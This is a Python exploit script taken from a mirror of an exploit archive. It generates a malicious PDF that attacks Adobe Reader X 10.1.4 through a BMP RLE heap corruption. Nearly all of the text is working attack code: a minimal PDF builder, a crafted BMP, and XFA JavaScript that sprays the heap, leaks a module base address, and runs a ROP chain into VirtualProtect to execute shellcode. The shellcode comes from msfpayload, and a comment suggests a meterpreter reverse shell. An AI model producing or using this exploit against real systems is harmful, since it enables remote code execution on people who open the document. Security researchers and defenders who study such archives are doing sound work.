bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/26703.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

934 lines
No EOL
33 KiB
Python
Executable file
Raw Blame History

'''
Title: Adobe Reader X BMP/RLE heap corruption
Product: Adobe Reader X
Version: 10.x
Product Homepage: adobe.com
Binary affected: AcroForm.api
Binary Version: 10.1.4.38
Binary MD5: 8e0fc0c6f206b84e265cc3076c4b9841
Configuration Requirements
-----------------------------------------
Default configuration.
Vulnerability Requirements
-----------------------------------------
None.
Vulnerability Description
-----------------------------------------
Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious embeded bmp image triggers a heap overflow.
Vulnerability WorkAround (if possible)
-----------------------------------------
Delete AcroForm.api
'''
from hashlib import md5
import sys, struct
######### Begin of the miniPDF
import zlib
#For constructing a minimal pdf file
## PDF REference 3rd edition:: 3.2 Objects
class PDFObject:
def __init__(self):
self.n=None
self.v=None
def __str__(self):
raise Exception("Fail")
## PDF REference 3rd edition:: 3.2.1 Booleans Objects
class PDFBool(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
if self.s:
return "true"
return "false"
## PDF REference 3rd edition:: 3.2.2 Numeric Objects
class PDFNum(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "%s"%self.s
## PDF REference 3rd edition:: 3.2.3 String Objects
class PDFString(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "(%s)"%self.s
## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings
class PDFHexString(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">"
## A convenient type of literal Strings
class PDFOctalString(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s="".join(["\\%03o"%ord(c) for c in s])
def __str__(self):
return "(%s)"%self.s
## PDF REference 3rd edition:: 3.2.4 Name Objects
class PDFName(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "/%s"%self.s
## PDF REference 3rd edition:: 3.2.5 Array Objects
class PDFArray(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
assert type(s) == type([])
self.s=s
def append(self,o):
self.s.append(o)
return self
def __str__(self):
return "[%s]"%(" ".join([ o.__str__() for o in self.s]))
## PDF REference 3rd edition:: 3.2.6 Dictionary Objects
class PDFDict(PDFObject):
def __init__(self, d={}):
PDFObject.__init__(self)
self.dict = {}
for k in d:
self.dict[k]=d[k]
def __iter__(self):
for k in self.dict.keys():
yield k
def __iterkeys__(self):
for k in self.dict.keys():
yield k
def __getitem__(self, key):
return self.dict[key]
def add(self,name,obj):
self.dict[name] = obj
def get(self,name):
if name in self.dict.keys():
return self.dict[name]
else:
return None
def __str__(self):
s="<<"
for name in self.dict:
s+="%s %s "%(PDFName(name),self.dict[name])
s+=">>"
return s
## PDF REference 3rd edition:: 3.2.7 Stream Objects
class PDFStream(PDFDict):
def __init__(self,d={},stream=""):
PDFDict.__init__(self,d)
self.stream=stream
self.filtered=self.stream
self.add('Length', len(stream))
self.filters = []
def appendFilter(self, filter):
self.filters.append(filter)
self._applyFilters() #yeah every time .. so what!
def _applyFilters(self):
self.filtered = self.stream
for f in self.filters:
self.filtered = f.encode(self.filtered)
if len(self.filters)>0:
self.add('Length', len(self.filtered))
self.add('Filter', PDFArray([f.name for f in self.filters]))
#Add Filter parameters ?
def __str__(self):
self._applyFilters() #yeah every time .. so what!
s=""
s+=PDFDict.__str__(self)
s+="\nstream\n"
s+=self.filtered
s+="\nendstream"
return s
## PDF REference 3rd edition:: 3.2.8 Null Object
class PDFNull(PDFObject):
def __init__(self):
PDFObject.__init__(self)
def __str__(self):
return "null"
## PDF REference 3rd edition:: 3.2.9 Indirect Objects
class UnResolved(PDFObject):
def __init__(self,n,v):
PDFObject.__init__(self)
self.n=n
self.v=v
def __str__(self):
return "UNRESOLVED(%d %d)"%(self.n,self.v)
class PDFRef(PDFObject):
def __init__(self,obj):
PDFObject.__init__(self)
self.obj=[obj]
def __str__(self):
if len(self.obj)==0:
return "null"
return "%d %d R"%(self.obj[0].n,self.obj[0].v)
## PDF REference 3rd edition:: 3.3 Filters
## Example Filter...
class FlateDecode:
name = PDFName('FlateDecode')
def __init__(self):
pass
def encode(self,stream):
return zlib.compress(stream)
def decode(self,stream):
return zlib.decompress(stream)
## PDF REference 3rd edition:: 3.4 File Structure
## Simplest file structure...
class PDFDoc():
def __init__(self,obfuscate=0):
self.objs=[]
self.info=None
self.root=None
def setRoot(self,root):
self.root=root
def setInfo(self,info):
self.info=info
def _add(self,obj):
if obj.v!=None or obj.n!=None:
raise Exception("Already added!!!")
obj.v=0
obj.n=1+len(self.objs)
self.objs.append(obj)
def add(self,obj):
if type(obj) != type([]):
self._add(obj);
else:
for o in obj:
self._add(o)
def _header(self):
return "%PDF-1.5\n%\xE7\xF3\xCF\xD3\n"
def __str__(self):
doc1 = self._header()
xref = {}
for obj in self.objs:
xref[obj.n] = len(doc1)
doc1+="%d %d obj\n"%(obj.n,obj.v)
doc1+=obj.__str__()
doc1+="\nendobj\n"
posxref=len(doc1)
doc1+="xref\n"
doc1+="0 %d\n"%(len(self.objs)+1)
doc1+="0000000000 65535 f \n"
for xr in xref.keys():
doc1+= "%010d %05d n \n"%(xref[xr],0)
doc1+="trailer\n"
trailer = PDFDict()
trailer.add("Size",len(self.objs)+1)
if self.root == None:
raise Exception("Root not set!")
trailer.add("Root",PDFRef(self.root))
if self.info:
trailer.add("Info",PDFRef(self.info))
doc1+=trailer.__str__()
doc1+="\nstartxref\n%d\n"%posxref
doc1+="%%EOF"
return doc1
######### End of miniPDF
SLIDESIZE=0x12C
def mkBMP(payload, exception=True):
bmp = ''
#getInfoHeader
bfType = 0x4d42
assert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043] #0x4142: not supp
bmp += struct.pack('<H', bfType)
bfSize = 0
bfOffBits = 0
bmp += struct.pack('<L', bfSize)
bmp += struct.pack('<H', 0) #Reserved1
bmp += struct.pack('<H', 0) #Reserved2
bmp += struct.pack('<L', bfOffBits)
biSize = 0x40
assert not biSize in [0x12]
bmp += struct.pack('<L', biSize)
biHeight = 1
biWidth = SLIDESIZE #size of texture structure LFH enabled
biPlanes = 1
biBitCount = 8
biCompression = 1
biSizeImage = 0
biXPelsPerMeter = 0
biYPelsPerMeter = 0
biClrUsed = 2
if biClrUsed >0xff:
raise "BUG!!!!"
biClrImportant = 0
bmp += struct.pack('<L', biWidth)
bmp += struct.pack('<L', biHeight)
bmp += struct.pack('<H', biPlanes)
bmp += struct.pack('<H', biBitCount)
bmp += struct.pack('<L', biCompression)
bmp += struct.pack('<L', biSizeImage)
bmp += struct.pack('<L', biXPelsPerMeter)
bmp += struct.pack('<L', biYPelsPerMeter)
bmp += struct.pack('<L', biClrUsed)
bmp += struct.pack('<L', biClrImportant)
bmp += 'A'*(biSize-0x40) #pad
numColors=biClrUsed
if biClrUsed == 0 or biBitCount < 8:
numColors = 1<<biBitCount;
bmp += 'RGBA'*(numColors) #pallete
bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) / 0xff)
#while (len(bmp)+10)%0x400 != 0:
# bmp += '\x00\x02\x00\x00'
assert len(payload) < 0x100 and len(payload) >= 3
bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00'
bmp += '\x00'+chr(len(payload))+payload
if len(payload)&1 :
bmp += 'P'
if exception:
bmp += '\x00\x02\x00\xff'*10 #getting the pointer outside the texture so it triggers an exception
bmp += '\x00'+chr(10)+'X'*10
else:
bmp += '\x00\x01'
#'\x04X'*(biWidth+2000)+"\x00\x02"
return bmp
def UEncode(s):
r = ''
s += '\x00'*(len(s)%2)
for i in range(0,len(s),2):
r+= '\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0])
return r
r = ''
for c in s:
r+= '%%%02x'%ord(c)
return r
def mkXFAPDF(shellcode = '\x90'*0x400+'\xcc'):
xdp = '''
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7">
<template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
<?formServer defaultPDFRenderFormat acrobat9.1static?>
<?formServer allowRenderCaching 0?>
<?formServer formModel both?>
<subform name="form1" layout="tb" locale="en_US" restoreState="auto">
<pageSet>
<pageArea name="Page1" id="Page1">
<contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
<medium stock="default" short="612pt" long="792pt"/>
<?templateDesigner expand 1?>
</pageArea>
<?templateDesigner expand 1?>
</pageSet>
<variables>
<script name="util" contentType="application/x-javascript">
// Convenience functions to pack and unpack litle endian an utf-16 strings
function pack(i){
var low = (i & 0xffff);
var high = ((i>>16) & 0xffff);
return String.fromCharCode(low)+String.fromCharCode(high);
}
function unpackAt(s, pos){
return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16);
}
function packs(s){
result = "";
for (i=0;i<s.length;i+=2)
result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8));
return result;
}
function packh(s){
return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));
}
function packhs(s){
result = "";
for (i=0;i<s.length;i+=4)
result += packh(s.slice(i,i+4));
return result;
}
var verbose = 1;
function message(x){
if (util.verbose == 1 )
xfa.host.messageBox(x);
}
//ROP0
//7201E63D XCHG EAX,ESP
//7201E63E RETN
//ROP1
//7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle]
//ROP2
//7238EF5C PUSH EAX
//7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress]
//7238EF63 TEST EAX,EAX
//7238EF65 JNE SHORT 7238EF84
//7238EF84 POP EBP
//7238EF85 RETN 4
//ROP3
//72001186 JMP EAX ; kernel32.VirtualProtect
//ROP4
//72242491 ADD ESP,70
//72242494 RETN
var _offsets = {'Reader": { "10.104": {
"acrord32": 0xA4,
"rop0": 0x1E63D,
"rop1": 0x100A,
"rop2": 0x38EF5C,
"rop3": 0x1186,
"rop4": 0x242491,
},
"10.105": { // Added by Eddie Mitchell
"acrord32": 0xA5,
"rop0": 0x1E52D,
"rop1": 0x100A,
"rop2": 0x393526,
"rop3": 0x1186,
"rop4": 0x245E71,
},
"10.106": { // Added by Eddie Mitchell
"acrord32": 0xA5,
"rop0": 0x1E52D,
"rop1": 0x100A,
"rop2": 0x393526,
"rop3": 0x1186,
"rop4": 0x245E71,
},
},
"Exchange-Pro": {
"10.105": { // Added by Eddie Mitchell
"acrobat": 0xCD,
"rop0": 0x3720D,
"rop1": 0x100A,
"rop2": 0x3DCC91,
"rop3": 0x180F,
"rop4": 0x25F2A1,
},
},
};
function offset(x){
//app.viewerType will be "Reader" for Reader,
//"Exchange" for Acrobat Standard or "Exchange-Pro" for Acrobat Pro
try {
return _offsets[app.viewerType][app.viewerVersion][x];
}
catch (e) {
xfa.host.messageBox("Type:" +app.viewerType+ " Version: "+app.viewerVersion+" NOT SUPPORTED!");
}
return 0x41414141;
}
</script>
<script name="spray" contentType="application/x-javascript">
// Global variable for spraying
var slide_size=%%SLIDESIZE%%;
var size = 200;
var chunkx = "%%MINICHUNKX%%";
var x = new Array(size);
var y = new Array(size);
var z = new Array(size);
var pointers = new Array(100);
var done = 0;
</script>
<?templateDesigner expand 1?>
</variables>
<subform w="576pt" h="756pt">
<!-- This image fiel hold the cashing image -->
<field name="ImageCrash">
<ui> <imageEdit/> </ui>
<value>
<image aspect="actual" contentType="image/jpeg">%%BMPFREELFH%%</image>
</value>
</field>
</subform>
<event activity="initialize" name="event__initialize">
<script contentType="application/x-javascript">
// This script runs at the very beginning and
// is used to prepare the memory layout
util.message("Initialize");
var i; var j;
if (spray.done == 0){
//Trigger LFH use
var TOKEN = "\u5858\u5858\u5678\u1234";
var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2);
for (i=0; i < spray.size; i+=1)
spray.x[i] = TOKEN + util.pack(i) +
spray.chunkx.substring(0, chunk_len) +
util.pack(i) + "";
util.message("Initial spray done!");
for (j=0; j < size; j++)
for (i=spray.size-1; i > spray.size/4; i-=10)
spray.x[i]=null;
spray.done = 1;
util.message("Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
}
// After this the form layout is rendered and the bug triggered
</script>
</event>
<event activity="docReady" ref="$host" name="event__docReady">
<script contentType="application/x-javascript">
// This script runs once the page is ready
util.message("DocReady");
var i; var j;
var found = -1; // Index of the overlapped string
var acro = 0; // Base of the AcroRd32_dll
// Search over all strings for the first one with the broken TOKEN
for (i=0; i < spray.size; i+=1)
if ((spray.x[i]!=null) && (spray.x[i][0] != "\u5858")){
found = i;
acro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset("acrord32")) << 16;
util.message("Found! String number "+ found + " has been corrupted acrord32.dll:" + acro.toString(16) );
break;
}
// Behaviour is mostly undefined if not found
if (found == -1){
util.message("Corrupted String NOT Found!");
event.target.closeDoc(true);
}
// Corrupted string was found let's generates the new
// string for overlapping the struct before freeing it
var chunky = "";
for (i=0; i < 7; i+=1)
chunky += util.pack(0x41414141);
chunky += util.pack(0x10101000);
while (chunky.length < spray.slide_size/2)
chunky += util.pack(0x58585858);
// Free the overlapping string
util.message("Feeing corrupted string! Previous string will we used-free ("+(found)+")");
for (j=0; j < 100000; j++)
spray.x[found-1]=spray.x[found]=null;
// Trigger several allocs that will fall over the structure
for (i=0; i < 200; i+=1){
ID = "" + i;
spray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ "";
}
util.message("Allocated 20 chunks-y\\n");
// Heap spraying make's baby jesus cry!
// Construct the 0x1000 small chunk for spraying
var obj = 0x10101000;
var pointer_slide = "";
pointer_slide += util.pack(acro+util.offset("rop4")); //add esp,70;ret
for (i=0; i < 27; i+=1)
pointer_slide += util.pack(0x41414141);
obj += pointer_slide.length*2;
// ROP
pointer_slide += util.pack(acro+util.offset("rop0")); //XCHG EAX,ESP;ret
pointer_slide += util.pack(acro+util.offset("rop1")); //0x100A jmp getmodule
pointer_slide += util.pack(acro+util.offset("rop2")); //@0x04 - getProcAddress
pointer_slide += util.pack(obj+0xDC); //@0x08 point to KERNEL32
//@0x10
pointer_slide += util.pack(obj+0xCC);
pointer_slide += util.pack(0x43434343); // POPPED TO EBP
pointer_slide += util.pack(acro+util.offset("rop3")); // JMP EAX
pointer_slide += util.pack(obj); //Points to offset 0 of this
//@0x20
pointer_slide += util.pack(obj+0x38);
pointer_slide += util.pack(obj+0x38);
pointer_slide += util.pack(0x1000); //SIZE_T dwSize,
pointer_slide += util.pack(0x40); // DWORD flNewProtect,
//0x30
pointer_slide += util.pack(obj+0x34); //PDWORD lpflOldProtect
pointer_slide += util.pack(0x00000000); //DWORD OldProtect
pointer_slide += util.packhs("E9B1000000909090");
//0x40
pointer_slide += util.pack(acro); //Used by next stage
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
//0x50
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
//0x60
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
//0x70
pointer_slide += util.pack(acro);
pointer_slide += util.pack(0x48484848);
pointer_slide += util.pack(0x49494949);
pointer_slide += util.pack(0x49494949);
//0x80
pointer_slide += util.pack(0x49494949);
pointer_slide += util.pack(0x50505050);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
//0x90
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
//0xa0
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
//0xb0
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
//0xc0
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.packs("VirtualProtect"); //@0xCC
pointer_slide += "\u0000";
pointer_slide += "KERNEL32";
pointer_slide += "\u0000";
pointer_slide += "%%SHELLCODE%%";
while (pointer_slide.length < 0x1000/2)
pointer_slide += util.pack(0x41414141);
pointer_slide = pointer_slide.substring(0,0x1000/2);
util.message("Pointer slide size: " + pointer_slide.length);
// And now ensure it gets bigger than 0x100000 bytes
while (pointer_slide.length < 0x100000/2)
pointer_slide += pointer_slide;
// And the actual spray
for (i=0; i < 100; i+=1)
spray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + "";
// Everything done here close the doc and
// trigger the use of the vtable
util.message("Now what?");
var pdfDoc = event.target;
pdfDoc.closeDoc(true);
</script>
</event>
</subform>
<?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>
<?templateDesigner DefaultLanguage JavaScript?>
<?templateDesigner DefaultRunAt client?>
<?acrobat JavaScript strictScoping?>
<?PDFPrintOptions embedViewerPrefs 0?>
<?PDFPrintOptions embedPrintOnFormOpen 0?>
<?PDFPrintOptions scalingPrefs 0?>
<?PDFPrintOptions enforceScalingPrefs 0?>
<?PDFPrintOptions paperSource 0?>
<?PDFPrintOptions duplexMode 0?>
<?templateDesigner DefaultPreviewType interactive?>
<?templateDesigner DefaultPreviewPagination simplex?>
<?templateDesigner XDPPreviewFormat 19?>
<?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
<?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
<?templateDesigner Zoom 119?>
<?templateDesigner FormTargetVersion 30?>
<?templateDesigner SaveTaggedPDF 1?>
<?templateDesigner SavePDFWithEmbeddedFonts 1?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
<config xmlns="http://www.xfa.org/schema/xci/3.0/">
<agent name="designer">
<!-- [0..n] -->
<destination>pdf</destination>
<pdf>
<!-- [0..n] -->
<fontInfo/>
</pdf>
</agent>
<present>
<!-- [0..n] -->
<pdf>
<!-- [0..n] -->
<version>1.7</version>
<adobeExtensionLevel>5</adobeExtensionLevel>
</pdf>
<common/>
<xdp>
<packets>*</packets>
</xdp>
</present>
</config>
<localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/">
<locale name="en_US" desc="English (United States)">
<calendarSymbols name="gregorian">
<monthNames>
<month>January</month>
<month>February</month>
<month>March</month>
<month>April</month>
<month>May</month>
<month>June</month>
<month>July</month>
<month>August</month>
<month>September</month>
<month>October</month>
<month>November</month>
<month>December</month>
</monthNames>
<monthNames abbr="1">
<month>Jan</month>
<month>Feb</month>
<month>Mar</month>
<month>Apr</month>
<month>May</month>
<month>Jun</month>
<month>Jul</month>
<month>Aug</month>
<month>Sep</month>
<month>Oct</month>
<month>Nov</month>
<month>Dec</month>
</monthNames>
<dayNames>
<day>Sunday</day>
<day>Monday</day>
<day>Tuesday</day>
<day>Wednesday</day>
<day>Thursday</day>
<day>Friday</day>
<day>Saturday</day>
</dayNames>
<dayNames abbr="1">
<day>Sun</day>
<day>Mon</day>
<day>Tue</day>
<day>Wed</day>
<day>Thu</day>
<day>Fri</day>
<day>Sat</day>
</dayNames>
<meridiemNames>
<meridiem>AM</meridiem>
<meridiem>PM</meridiem>
</meridiemNames>
<eraNames>
<era>BC</era>
<era>AD</era>
</eraNames>
</calendarSymbols>
<datePatterns>
<datePattern name="full">EEEE, MMMM D, YYYY</datePattern>
<datePattern name="long">MMMM D, YYYY</datePattern>
<datePattern name="med">MMM D, YYYY</datePattern>
<datePattern name="short">M/D/YY</datePattern>
</datePatterns>
<timePatterns>
<timePattern name="full">h:MM:SS A Z</timePattern>
<timePattern name="long">h:MM:SS A Z</timePattern>
<timePattern name="med">h:MM:SS A</timePattern>
<timePattern name="short">h:MM A</timePattern>
</timePatterns>
<dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols>
<numberPatterns>
<numberPattern name="numeric">z,zz9.zzz</numberPattern>
<numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern>
<numberPattern name="percent">z,zz9%</numberPattern>
</numberPatterns>
<numberSymbols>
<numberSymbol name="decimal">.</numberSymbol>
<numberSymbol name="grouping">,</numberSymbol>
<numberSymbol name="percent">%</numberSymbol>
<numberSymbol name="minus">-</numberSymbol>
<numberSymbol name="zero">0</numberSymbol>
</numberSymbols>
<currencySymbols>
<currencySymbol name="symbol">$</currencySymbol>
<currencySymbol name="isoname">USD</currencySymbol>
<currencySymbol name="decimal">.</currencySymbol>
</currencySymbols>
<typefaces>
<typeface name="Myriad Pro"/>
<typeface name="Minion Pro"/>
<typeface name="Courier Std"/>
<typeface name="Adobe Pi Std"/>
<typeface name="Adobe Hebrew"/>
<typeface name="Adobe Arabic"/>
<typeface name="Adobe Thai"/>
<typeface name="Kozuka Gothic Pro-VI M"/>
<typeface name="Kozuka Mincho Pro-VI R"/>
<typeface name="Adobe Ming Std L"/>
<typeface name="Adobe Song Std L"/>
<typeface name="Adobe Myungjo Std M"/>
</typefaces>
</locale>
<?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data xfa:dataNode="dataGroup"/>
</xfa:datasets>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 ">
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="">
<xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate>
<xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool>
<xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate>
<xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate>
</rdf:Description>
<rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about="">
<pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer>
</rdf:Description>
<rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" rdf:about="">
<xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID>
<xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID>
</rdf:Description>
<rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/" rdf:about="">
<dc:format>application/pdf</dc:format>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
<xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
<annots/>
</xfdf></xdp:xdp>
'''
assert len(shellcode) <= 0xF00, "You need a smaller shellcode, sorry"
#shellcode
xdp = xdp.replace("%%SHELLCODE%%",UEncode(shellcode))
xdp = xdp.replace("%%SLIDESIZE%%", "0x%x"%SLIDESIZE);
xdp = xdp.replace("%%MINICHUNKX%%",UEncode('O'*SLIDESIZE))
xdp = xdp.replace("%%BMPFREELFH%%",mkBMP('\x01\x00\x00\x00\x00\x00'+ chr(0x27)+'\x05',True).encode('base64'))
#xdp = xdp.replace("%%BMPFREELFH%%",file("/usr/share/pixmaps/gnome-news.png","rb").read().encode('base64'))
file("%s.log"%sys.argv[0].split('.')[0],'wb').write(xdp)
#The document
doc = PDFDoc()
#font
font = PDFDict()
font.add("Name", PDFName("F1"))
font.add("Subtype", PDFName("Type1"))
font.add("BaseFont", PDFName("Helvetica"))
#name:font map
fontname = PDFDict()
fontname.add("F1",font)
#resources
resources = PDFDict()
resources.add("Font",fontname)
#contents
contentsDict = PDFDict()
contents= PDFStream(contentsDict, '''BT
/F1 24 Tf
100 100 Td
(Pedefe Pedefeito Pedefeon!) Tj
ET''')
#page
page = PDFDict()
page.add("Type",PDFName("Page"))
page.add("Resources",resources)
page.add("Contents", PDFRef(contents))
#pages
pages = PDFDict()
pages.add("Type", PDFName("Pages"))
pages.add("Kids", PDFArray([PDFRef(page)]))
pages.add("Count", PDFNum(1))
#add parent reference in page
page.add("Parent",PDFRef(pages))
xfa = PDFStream(PDFDict(), xdp)
xfa.appendFilter(FlateDecode())
doc.add(xfa)
#form
form = PDFDict()
form.add("XFA", PDFRef(xfa))
doc.add(form)
#shellcode2
shellcode2 = PDFStream(PDFDict(), struct.pack("<L",0xcac0face)+"\xcc"*10)
doc.add(shellcode2)
#catalog
catalog = PDFDict()
catalog.add("Type", PDFName("Catalog"))
catalog.add("Pages", PDFRef(pages))
catalog.add("NeedsRendering", "true")
catalog.add("AcroForm", PDFRef(form))
adbe = PDFDict()
adbe.add("BaseVersion","/1.7")
adbe.add("ExtensionLevel",PDFNum(3))
extensions = PDFDict()
extensions.add("ADBE", adbe)
catalog.add("Extensions",extensions)
doc.add([catalog,pages,page,contents])
doc.setRoot(catalog)
#render it
return doc.__str__()
if __name__ == '__main__':
import optparse,os
from subprocess import Popen, PIPE
parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit')
parser.add_option('--debug', action='store_true', default=False, help='For debugging')
parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default="windows/messagebox ", help="Metasploit payload. Ex. 'win32_exec CMD=calc'")
parser.add_option('--payload', metavar='PAYLOAD', default=None)
parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')
(options, args) = parser.parse_args()
if options.doc:
print __doc__
os.exit(-1)
if options.debug:
print mkXFAPDF(),
os.exit(-1)
if options.payload == None:
#"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R"
msfpayload = Popen("msfpayload4.4 %s R"%options.msfpayload, shell=True, stdout=PIPE)
shellcode = msfpayload.communicate()[0]
else:
shellcode = file(options.payload, "rb").read() #options.hexpayload.decode('hex')
print mkXFAPDF(shellcode),
Reference in a new issue View git blame Copy permalink